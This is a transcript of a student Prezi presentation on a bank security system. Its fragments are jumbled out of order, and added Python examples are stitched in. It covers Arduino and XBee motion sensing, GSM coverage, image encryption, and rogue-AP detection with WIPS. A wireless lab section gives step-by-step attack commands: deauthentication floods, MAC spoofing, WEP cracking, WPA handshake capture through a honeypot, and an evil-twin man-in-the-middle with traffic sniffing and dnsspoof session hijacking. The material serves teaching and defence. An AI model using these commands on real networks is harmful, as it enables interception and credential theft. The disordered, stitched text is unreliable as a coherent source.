Transcript of Untitled Prezi
Idea of motion detection
The PC controls whether our system is in day or night mode.
We can control our system wirelessly using XBee.
The wireless system used must be compatible with the Arduino and the sensors.
Arduino program flow chart
The network is divided into 3 major networks; we designed the network according to:
1- The internal network of the bank
2- The service provider network
3- The other site of the network in another city
What network did we design?
1- Multi-site network (wired network)
2- Multi-site network (VoIP network)
3- Single-site network (wireless network)
What about the wired security itself?
GSM transmission chain
About the designed firewall
What about the wired network itself?
What is Lockitron?
It's a mobile application that allows you to remotely open and close doors …
What does it have to do with our project?
We replaced the card reader owned by each employee with that mobile application on each employee's mobile.
3- Flexible (can be repaired and tuned easily)
Our main focus in the project is to design a security system for a bank, and we are considering everything in that secure system.
Our security system involves 5 major topics, which are:
1- Control and surveillance
4- Indoor coverage (GSM coverage)
The addition of WLANs to the corporate environment introduces a new class of threats for network security. Rogue access points are the greatest threat.
What is a Rogue AP?
What are some specific attacks which can be launched through a Rogue AP?
1. MAC address spoofing
Evil twin with MAC spoofing
How can you protect the enterprise network from Rogue APs?
* Can the firewall protect from a Rogue AP?
signal transmission problems
Example of an encrypted image
(motion detection)
Camera frame
Wireless lab setup:
1- Hardware Requirements
1- iwconfig
2- ifconfig wlan1 up
Testing connectivity between the tester laptop and the access point :
- Commands:
1- iwlist wlan1 scanning
2- iwconfig wlan1 essid "ESLAM TEST"
- iwconfig wlan1
- WLAN frame types:
1- Management frames
2- Control frames
3- Data frames
- Meaning of sniffing frames.
- Sniffing management, control, and data frames over any wireless network:
----- 1- Monitor mode interface:
b- airmon-ng start wlan1
----- 2- Wireshark:
a- Run wireshark &, then Capture > Interfaces > mon0 > Start
b- Filters:
- Management frames only: wlan.fc.type == 0
- Control frames only: wlan.fc.type == 1
- Data frames only: wlan.fc.type == 2
- Sniffing management, control, and data frames over a given wireless network:
- Commands:
1- airodump-ng --bssid A0:F3:C1:78:32:4B mon0
2- iwconfig mon0 channel 6
- iwconfig mon0
3- Run wireshark &, then Capture > Interfaces > mon0 > Start
4- Filter: wlan.bssid == A0:F3:C1:78:32:4B
5- Filter, data packets only: (wlan.bssid == 00:21:91:d2:8e:25) && (wlan.fc.type_subtype == 0x20)
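The Wireshark filters above select frames by the type and subtype bits of the Frame Control field. The following added example, which is not part of the original presentation, decodes those bits from raw 802.11 headers the same way (wlan.fc.type and wlan.fc.type_subtype) and, as a defender's use of the same information, flags a burst of deauthentication frames against one BSSID; the frames and the burst threshold are constructed here.

```python
from collections import Counter

TYPE_NAMES = {0: "management", 1: "control", 2: "data"}
MGMT_SUBTYPES = {0x4: "probe-req", 0x5: "probe-resp", 0x8: "beacon",
                 0xa: "disassoc", 0xb: "auth", 0xc: "deauth"}
DEAUTH_BURST_THRESHOLD = 5  # assumed threshold; tune for the monitored WLAN

def parse_frame_control(fc: bytes):
    """First Frame Control byte -> (version, type, subtype, type_subtype).
    Bits 0-1 are the protocol version, bits 2-3 the type (0 mgmt, 1 control,
    2 data) and bits 4-7 the subtype; the last value is the packed form that
    Wireshark exposes as wlan.fc.type_subtype (e.g. 0x20 = data/data)."""
    b0 = fc[0]
    version, ftype, subtype = b0 & 0x03, (b0 >> 2) & 0x03, (b0 >> 4) & 0x0f
    return version, ftype, subtype, (ftype << 4) | subtype

def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def summarize(frame: bytes) -> dict:
    """Decode FC, duration and addr1..addr3 of an 802.11 frame. For the
    management frames handled here, addr3 carries the BSSID."""
    if len(frame) < 22:
        raise ValueError("truncated 802.11 header")
    _, ftype, subtype, ts = parse_frame_control(frame[0:2])
    name = TYPE_NAMES.get(ftype, "reserved")
    if ftype == 0:
        name = MGMT_SUBTYPES.get(subtype, f"mgmt-{subtype:#x}")
    return {"type": ftype, "type_subtype": ts, "name": name,
            "addr1": mac_str(frame[4:10]), "addr2": mac_str(frame[10:16]),
            "bssid": mac_str(frame[16:22])}

def deauth_burst(frames, threshold=DEAUTH_BURST_THRESHOLD) -> dict:
    """Count deauth frames per BSSID and return those at or above threshold:
    a flood of them is what a deauth/evil-twin attempt looks like on the air."""
    counts = Counter()
    for f in frames:
        s = summarize(f)
        if s["name"] == "deauth":
            counts[s["bssid"]] += 1
    return {b: n for b, n in counts.items() if n >= threshold}

def make_frame(ftype: int, subtype: int, addr1: bytes, addr2: bytes, bssid: bytes) -> bytes:
    """Constructed test frame: FC (2 bytes) + duration (2 bytes) + three addresses, no body."""
    return bytes([(subtype << 4) | (ftype << 2), 0x00, 0x00, 0x00]) + addr1 + addr2 + bssid

# Constructed capture: one beacon, five deauths from the AP to a client, one data frame.
AP = bytes.fromhex("a0f3c178324b")      # BSSID used in the lab notes above
CLIENT = bytes.fromhex("b0ec71b18a17")
BCAST = b"\xff" * 6
SAMPLE = ([make_frame(0, 0x8, BCAST, AP, AP)]
          + [make_frame(0, 0xc, CLIENT, AP, AP) for _ in range(5)]
          + [make_frame(2, 0x0, AP, CLIENT, AP)])

if __name__ == "__main__":
    for f in SAMPLE:
        print(summarize(f))
    print("deauth bursts:", deauth_burst(SAMPLE))
```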
Injecting packets into a given wireless network:
- Meaning of packet injection.
1- aireplay-ng -9 -e "ESLAM TEST" -a A0:F3:C1:78:32:4B mon0
Uncovering hidden SSIDs:
1- Legitimate client (Probe Request, Probe Response)
2- Sending deauthentication packets.
Command: aireplay-ng -0 5 -a A0:F3:C1:78:32:4B mon0
MAC filters:
Setting up the wireless card (Alfa) and configuring it
- Beating MAC filters:
- Commands:
1- airodump-ng -c 6 -a --bssid A0:F3:C1:78:32:4B mon0
2- macchanger -m B0:EC:71:B1:8A:17 wlan1
Authentication types:
1- Open
2- Shared Key
3- Wired Equivalent Privacy (WEP)
4- Wi-Fi Protected Access (WPA)
5- Wi-Fi Protected Access v2 (WPA2)
1- Open authentication:
- Bypassing open authentication:
- Commands:
a- iwconfig wlan1 essid "ESLAM TEST"
b- iwconfig wlan1
2- Shared key authentication:
- Bypassing shared key authentication:
- Commands:
a- Run wireshark &, then Capture > Interfaces > mon0 > Start
b- airodump-ng mon0 -c 1 --bssid A0:F3:C1:78:32:4B -w keystream
d- aireplay-ng -1 0 -e "ESLAM TEST" -y keystream-04-A0-F3-C1-78-32-4B.xor -a A0:F3:C1:78:32:4B -h aa:aa:aa:aa:aa:aa mon0
e- Wireshark filter: wlan.addr == aa:aa:aa:aa:aa:aa
---- First packet:
---- Second packet:
---- Third packet:
---- Fourth packet:
3- WEP encryption:
- Bypassing WEP encryption:
- Commands:
a- airodump-ng mon0
b- airodump-ng --bssid A0:F3:C1:78:32:4B --channel 1 --write WEPCrackingDemo mon0
c- aireplay-ng -3 -b A0:D3:C1:78:32:B4 -h B0:EC:71:B1:8A:17 mon0 (capture ARP packets)
d- aircrack-ng WEPCrackingDemo-01.cap
Which type of detection can I use?
Motion detection camera
2- Adjacent channel interference
3- Multipath fading
4- Shadow fading
5- Doppler shift
6- Delay Spread (Time Dispersion)
7- Distance Between MS and BTS
8- Path loss
1. Analog-to-digital conversion
(GSM uses PCM, Pulse Code Modulation)
We reduce the bandwidth
Band-limiting + sampling
Number of levels = 2^13 = 8192 levels
Encoder rate = 8000 * 13 = 104 kb/s
We divide the signal into groups; each group takes 20 ms and has 2080 bits.
Add 3 bits called 'parity check bits'
* Block interleaving
* Burst interleaving
Burst assembly and multiplexing
Here we add the training sequence, flags, T.B and H.B
GMSK (Gaussian Minimum Shift Keying) is the modulation scheme for the GSM system.
Encryption is the process of encoding messages (or information) in such a way that hackers cannot read it: the message or information (referred to as plaintext) is encrypted using an encryption algorithm, turning it into unreadable ciphertext.
This is usually done with the use of an encryption key.
Encryption was first used in a simple way, done by shifting every letter 3 places.
The RC6 algorithm
It looks like the algorithm used for text, but we deal with images, so to encrypt an image we encrypt the image pixels to produce scattered pixels that are hard to understand.
By this we will have an image that is unclear to others, so we are able to keep the image secure from hackers.
I will translate some of the last steps and add new steps into MATLAB code.
Some additions to develop the code:
1- Instead of using a fixed key, we can take a key from the command window in MATLAB, with some conditions.
2- We can use shift operations to make the encrypted image more unclear to the attacker.
3- We can divide the image into more than 4 parts, and the division can be done by equal-length parts, equal-width parts, or both.
4- When collecting the parts to form the image, we can follow many arrangements instead of the one used in the code.
Distributed Antenna System (DAS)
Donor (roof) antenna
* Directional antenna
The higher the gain of the antenna, the more the signal is focused along a specific plane.
BDA (Bi-Directional RF Amplifier)
* Omnidirectional antenna
Basic Single Structure application
The range of the different types of antenna
1. Bi-directional Amplifier (BDA)
* Poor out-of-band rejection
* Fixed filtering
2. Analog RF booster
* Better filtering
* Multiple bands
3. Digital RF booster
CHARACTERISTICS OF EACH DESIGN
* The delay through a filter is inversely proportional to its bandwidth and directly proportional to the filter order.
* A narrow-band filter with a sharp roll-off will have a higher time delay than a wide-band filter with a soft roll-off.
* Preventing Feedback Oscillations
* Automatic Gain Control (AGC)
* Microprocessor-Controlled AGC
* Automatic Gain Optimization during set up
* Oscillation Prevention
* Long Term Maintenance
Base Station Disease
Other Services Disease
Single Structure Fiber Optic application
Multiple Structure 'Campus' application
Example of RF distribution on one floor
Rogue APs represent unauthorized access points and can be internal or external.
Why is a Rogue AP such a bad thing?
A Rogue AP on the network is (logically) a LAN jack of your network hanging outside the premises.
We have two types of rogue access point:
1. The internal rogue AP
2. The external rogue access point
3. Man-in-the-Middle attack (MITM)
4. Monitoring WLAN traffic and breaking the encryption keys
- The firewall works at the traffic transfer point between the LAN and the Internet
- The firewall does not detect Rogue APs
- The firewall does not see traffic through a Rogue AP
* Can WPA2 protect from a Rogue AP?
You can enforce security controls such as WPA2 only on APs which you manage, i.e., your authorized APs.
But a Rogue AP is not your managed AP.
* So what protects the network from Rogue APs?
Sensor-based wireless intrusion prevention system (WIPS)
- Watches for Rogue APs 24x7
- Performs wired/wireless correlation (AP network connectivity testing) to detect Rogue APs
- Provides automatic blocking of Rogue APs
- Locates Rogue APs for easy searching and removal from the network
A typical wireless intrusion prevention system consists of:
What does AP auto-classification mean in the context of Rogue APs?
What is the key technology enabler for accurate auto-classification? Testing an AP's connectivity to the monitored enterprise network is the key technology enabler.
How can WIPS detect a rogue access point?
1) MAC correlation (MAC table lookup)
Can be done using BackTrack and the Alfa card.
a. The administrator has provided us with the list of MAC addresses of authorized clients and access points.
We create the monitor mode interface using our card, as shown.
We use this command to start scanning the air as seen by the Alfa card.
We dump a list of all MAC addresses on the switch of the clients' network. In the most common case, the wired and wireless interface MAC addresses differ by 1.
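The MAC correlation described above, as an added example that is not part of the original project: the authorized list, the airodump-ng scan result and the switch MAC table are constructed stand-ins (the ESSID names and switch port names are assumed), and the "differ by 1" rule is applied as a +/-1 window over the 48-bit address so that a carry across octet boundaries is handled.

```python
MAC_NEIGHBOUR_WINDOW = 1  # how far apart the wired and wireless MACs may be

def mac_to_int(mac: str) -> int:
    parts = mac.lower().split(":")
    if len(parts) != 6 or any(len(p) != 2 for p in parts):
        raise ValueError(f"bad MAC: {mac}")
    return int("".join(parts), 16)

def int_to_mac(value: int) -> str:
    return ":".join(f"{(value >> (8 * i)) & 0xff:02x}" for i in reversed(range(6)))

def neighbours(mac: str, window: int = MAC_NEIGHBOUR_WINDOW) -> set:
    """MACs within +/-window of mac, treated as one 48-bit integer so that
    the carry across octets (...:fe:ff -> ...:ff:00) is handled correctly."""
    base = mac_to_int(mac)
    return {int_to_mac(base + d) for d in range(-window, window + 1)
            if 0 <= base + d < (1 << 48)}

def classify_aps(observed: dict, authorized: set, switch_table: dict) -> dict:
    """observed: {bssid: essid} seen on the air; authorized: BSSIDs from the
    administrator's list; switch_table: {mac: port} dumped from the switch.
    Returns {bssid: (verdict, detail)}."""
    auth = {a.lower() for a in authorized}
    wired = {m.lower(): port for m, port in switch_table.items()}
    result = {}
    for bssid, essid in observed.items():
        b = bssid.lower()
        if b in auth:
            result[b] = ("authorized", essid)
            continue
        hits = [(m, wired[m]) for m in sorted(neighbours(b)) if m in wired]
        if hits:
            # The wireless BSSID correlates with a MAC learned on our switch:
            # an unauthorized AP that is plugged into the wired network.
            result[b] = ("rogue-on-wire", f"{essid} via port {hits[0][1]}")
        else:
            # Not ours and not on our wire: a neighbour's AP or an evil twin
            # that at least is not bridged into the LAN.
            result[b] = ("external", essid)
    return result

# Constructed sample data (ESSIDs and ports are assumed).
AUTHORIZED = {"a0:f3:c1:78:32:4b"}
OBSERVED = {"a0:f3:c1:78:32:4b": "BANK-CORP",
            "00:21:91:d2:8e:25": "BANK-CORP",   # same ESSID, not in our list
            "b0:ec:71:b1:8a:17": "CoffeeShop"}
SWITCH_TABLE = {"00:21:91:d2:8e:24": "Gi1/0/7",  # one below the unknown BSSID
                "a0:f3:c1:78:32:4a": "Gi1/0/1"}

if __name__ == "__main__":
    for bssid, (verdict, detail) in classify_aps(OBSERVED, AUTHORIZED, SWITCH_TABLE).items():
        print(f"{bssid}  {verdict:14s} {detail}")
```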
2) Signature packet injection
The main types of events which can be detected by wireless intrusion prevention systems:
1. Unauthorized WLANs and WLAN devices (rogue APs, unauthorized stations);
This can also be done using BackTrack:
look at the client part of the airodump-ng output:
2. Misconfigured access points
3. The use of wireless network scanners
4. Denial of Service (DoS)
5. Man-in-the-middle attacks
6. Unusual usage patterns
How does WIPS contain a rogue access point?
2. Vector method:
Locating (physical place) rogue wireless access points without using WIPS:
2- Software requirements
a. Two laptops with internal Wi-Fi cards.
b. One access point.
c. One Alfa wireless card.
d. An Internet connection.
a. BackTrack 5.
- Setting up an access point and configuring it:
We used an Arduino board based on an AVR microcontroller chip.
We used an AVR microcontroller because it is:
2. Simple to program
4. Available from 8 to 64 pins
A small microcontroller board based on the ATmega32U4
How to create a rogue access point through BackTrack
1. Let us first bring up our rogue access point using airbase-ng and give it the ESSID Rogue:
2. Use these commands to create a bridge between the rogue AP and the Ethernet interface.
The attacks that can be launched through BackTrack
Microcontroller: ATmega32U4
Operating voltage: 5 V
Input voltage (limits): 6-20 V
Input/output pins: 14 pins
PWM pins: 7 pins
Analog inputs: 6 pins
DC current per I/O pin: 40 mA
Flash memory: 32 KB
SRAM: 2.5 KB
Clock speed: 16 MHz
Why did we use Arduino?
From the software side:
Simple to program
Has a lot of examples
Has a great variety of libraries
Cross-platform: works on Windows, Mac, Linux
From the hardware side:
Power socket and reset button
Sockets for I/O pins
Can be powered by USB
Open source (hardware and software)
What is Arduino?
AVR is just a programmable integrated circuit.
Arduino is a mini system that has an AVR microcontroller, a power supply circuit, a reset circuit and a USB connection.
What types of Arduino are there?
How does it work?
1. Write code (a sketch) in the Arduino IDE in the Arduino C language
2. Then select the board and the serial COM port
3. Upload it to the Arduino board
In Arduino programming there are two main functions:
void setup()
To define inputs and outputs
void loop()
To write code here that is repeated forever
How does Arduino communicate?
Arduino uses a UART for serial communication with a computer.
What is meant by serial communication?
A single data line transmitting data
It has two types (synchronous and asynchronous)
What is meant by UART?
1. It is Arduino hardware that has built-in support for serial communication on pins 0 and 1, which also goes to the computer via the USB connection.
2. This hardware allows the ATmega chip to receive serial communication even while working on other tasks, as long as there is room in the 64-byte serial buffer.
General information about UART
1. A Universal Asynchronous Receiver/Transmitter (UART) takes bytes of data and transmits the individual bits in a sequence.
2. UART frame format (8-N-1)
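The 8-N-1 frame format above, worked through as an added example that is not part of the original presentation: each byte is sent as one start bit, eight data bits least-significant bit first, no parity bit and one stop bit, with the line idle high between frames; the receiver reports a framing error when the expected stop bit is not high. The payloads below are constructed.

```python
START, STOP, IDLE = 0, 1, 1   # line levels: start bit low, stop bit and idle high

def frame_byte(value: int) -> list:
    """One 8-N-1 frame for a single byte, as a list of line levels."""
    if not 0 <= value <= 0xff:
        raise ValueError("8-N-1 carries exactly 8 data bits per frame")
    data = [(value >> i) & 1 for i in range(8)]   # LSB goes on the wire first
    return [START] + data + [STOP]

def transmit(payload: bytes, idle_gap: int = 0) -> list:
    """Serialize a byte string; idle_gap idle bits are inserted after each frame,
    since the sender may pause between bytes (asynchronous = no shared clock)."""
    line = [IDLE]   # the line idles high before the first start bit
    for b in payload:
        line += frame_byte(b) + [IDLE] * idle_gap
    return line

def receive(line: list):
    """Recover bytes from line levels. Returns (bytes, framing_errors).
    The receiver hunts for a start bit, samples 8 data bits, then checks the
    stop bit; a low stop bit is counted as a framing error and the byte dropped."""
    out, errors, i = bytearray(), 0, 0
    while i < len(line):
        if line[i] != START:        # still idle: keep waiting for a start bit
            i += 1
            continue
        if i + 10 > len(line):      # start bit seen but the frame is cut off
            errors += 1
            break
        bits = line[i + 1:i + 9]
        value = sum(bit << k for k, bit in enumerate(bits))
        if line[i + 9] == STOP:
            out.append(value)
        else:
            errors += 1             # stop bit missing: framing error
        i += 10                     # resume hunting after this frame
    return bytes(out), errors

def bytes_per_second(baud: int) -> int:
    """8-N-1 spends 10 line bits per data byte, so 9600 baud moves 960 bytes/s."""
    return baud // 10

if __name__ == "__main__":
    wire = transmit(b"Hi", idle_gap=2)
    print(wire)
    print(receive(wire), bytes_per_second(9600))
```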
What about the wireless network itself?
What is the difference between Arduino and a normal microcontroller (AVR)?
What about the VoIP network?
There are three types of sensor which depend on infrared radiation:
1. Passive infrared sensor
Idea of the PIR in detecting motion
The PIR consists of:
First, we must know why we need to know about attacks.
By studying the types of attacks, we will have the ability to know whether we are exposed to an attack or not.
Imagine that you have no idea about the attacks; you will surely be hacked too easily.
First we make an access point with the same SSID as the access point in the vicinity. Many wireless users may accidentally connect to this malicious access point, thinking it is part of the authorized network. Once a connection is established, the attacker can orchestrate a man-in-the-middle attack and transparently relay traffic while eavesdropping on the entire communication.
Problems of the PIR and how to avoid them
1. No response to human motion
IR window filter
- Now we send a de-authentication frame to the client, so it disconnects and immediately tries to reconnect.
- As we are closer to this client, our signal strength is higher and it connects to our evil twin access point, as shown in the following screens.
An evil twin having the same MAC address as an authorized access point is even more difficult to detect and deter.
Calibration for the sensor
Angle: 120
Distance: 7 m max
Advantages of the sensor
Low power consumption
Wide-range lens
Easy to interface with
Normally, when a wireless client such as a laptop is turned on, it will probe for the networks it has previously connected to. These networks are stored in a list called the Preferred Network List (PNL) on Windows-based systems. Also, along with this list, it will display any networks available in its range.
If we create a fake access point "Wireless Lab" in the presence of the legitimate one, and the client is still connected to the legitimate access point "Wireless Lab", then we need to send broadcast de-authentication messages to the client on behalf of the legitimate access point to break their connection.
2. Infrared sensor:
Idea of the IR sensor
The Hirte attack extends the Caffe Latte attack using fragmentation techniques and allows almost any packet to be used. We create a WEP access point, and once any client connects to our honeypot AP, the Hirte attack is automatically launched.
Now, would it be possible to crack WPA-Personal with just the client? No access point!
To crack WPA, we need the following four parameters from the four-way handshake: Authenticator Nonce, Supplicant Nonce, Authenticator MAC, Supplicant MAC. Now the interesting thing is that we do not need all four packets of the handshake to extract this information. We can get this information with all four packets, or with packets 1 and 2, or with just packets 2 and 3.
A switch changes between open and closed by:
temperature, like a thermostat
current and voltage, like a relay
pressure, as in our case
In order to crack WPA-PSK, we will bring up a WPA-PSK honeypot, and when the client connects to us, only Message 1 and Message 2 will come through. As we do not know the passphrase, we cannot send Message 3. However, Message 1 and Message 2 contain all the information required to begin the key cracking process.
- We will set up a WPA-PSK honeypot with the ESSID Wireless Lab.
- Let's also start airodump-ng to capture packets from this network:
- Now when our roaming client connects to this access point, it starts the handshake but fails to complete it after Message 2, as discussed previously.
The attacker is connected to the Internet using a wired LAN and is creating a fake access point on his client card. This access point broadcasts an SSID similar to a local hotspot in the vicinity. A user may accidentally connect to this fake access point (or can be forced to, using the higher signal strength theory) and may continue to believe that he is connected to the legitimate access point.
The attacker can now transparently forward all the user's traffic over the Internet using the bridge he has created between the wired and wireless interfaces.
The steps:
1- We will first create a soft access point called mitm on the hacker laptop using airbase-ng. We run the command airbase-ng --essid mitm -c 11 mon0:
2- Now create a bridge on the hacker laptop, consisting of the wired (eth0) and wireless (at0) interfaces.
3- Let us now turn on IP forwarding in the kernel so that routing and packet forwarding can happen correctly, using echo 1 > /proc/sys/net/ipv4/ip_forward:
4- Now let us connect a wireless client to our access point mitm. It would automatically get an IP address over DHCP (server running on the wired-side gateway).
5- We see that the host responds to the ping requests, as seen.
6- We can also verify that the client is connected by looking at the airbase-ng terminal on the hacker machine:
It is interesting to note here that because all the traffic is being relayed from the wireless interface to the wired side, we have full control over the traffic.
Wireless Eavesdropping using MITM
The whole lab revolves around the principle that all the victim's traffic is now routed through the attacker's computer. Thus the attacker can eavesdrop on all the traffic sent to and from the victim's machine over wireless.
Start sniffing on the at0 interface, so that we can monitor all traffic sent and received by the wireless client.
When the wireless client opens any web page that needs a password to enter, by sniffing the packets and setting a filter for HTTP to see only the web traffic, we can easily locate the HTTP POST request, which was used to send the password to the wireless access point.
Expanding the HTTP header allows us to see that the password we entered in plaintext was not actually sent as is; instead, a hash was sent.
Session Hijacking over wireless
One of the other interesting attacks we can build on top of MITM is application session hijacking. During an MITM attack, the victim's packets are sent to the attacker. It is now the attacker's responsibility to relay them to the legitimate destination and relay the responses from the destination to the victim. An interesting thing to note is that, during this process, the attacker can modify the data in the packets (if unencrypted and unprotected from tampering). This means he could modify, mangle, and even silently drop packets.
The steps:
1- Set up the test exactly as in the Man-in-the-Middle attack lab.
On the victim, let's fire up the browser and type in "google.com". Let us use Wireshark to monitor this traffic. Your screen should resemble the following:
2- In order to hijack the browser session, we will need to send fake DNS responses which will resolve the IP address of "google.com" to the hacker machine's IP address 192.168.0.199. The tool we will use for this is called dnsspoof and the syntax is dnsspoof -i mitm-bridge:
3- Refresh the browser window, and now, as we can see through Wireshark, as soon as the victim makes a DNS request for any host (including google.com), dnsspoof replies back:
On the victim machine, we see an error which says "Connection Refused". This is because we have made the IP address for google.com 192.168.0.199, which is the hacker machine's IP, but there is no service listening on port 80:
4- Let us run Apache on BackTrack using the following command apache2ctl start:
5- Now once we refresh the browser on the victim, we are greeted with the "It Works" default page of Apache:
This demonstration shows how it is possible to intercept data and send spoofed responses to hijack sessions on the victim.
We faced more than one option compatible with the Arduino; the most used one is XBee.
We used XBee.
What is XBee?
Just a blue chip with 20 pins
An RF module that can send data wirelessly
The current manufacturer of XBee modules is Digi
Why XBee?
Uses the IEEE 802.15.4 standard (LR-WPAN)
Low power consumption
Low data rate
Types of XBee
> 30 m range indoor
> DigiMesh network
> 40 m range indoor
> ZigBee network
XBee Series 1
Pro & regular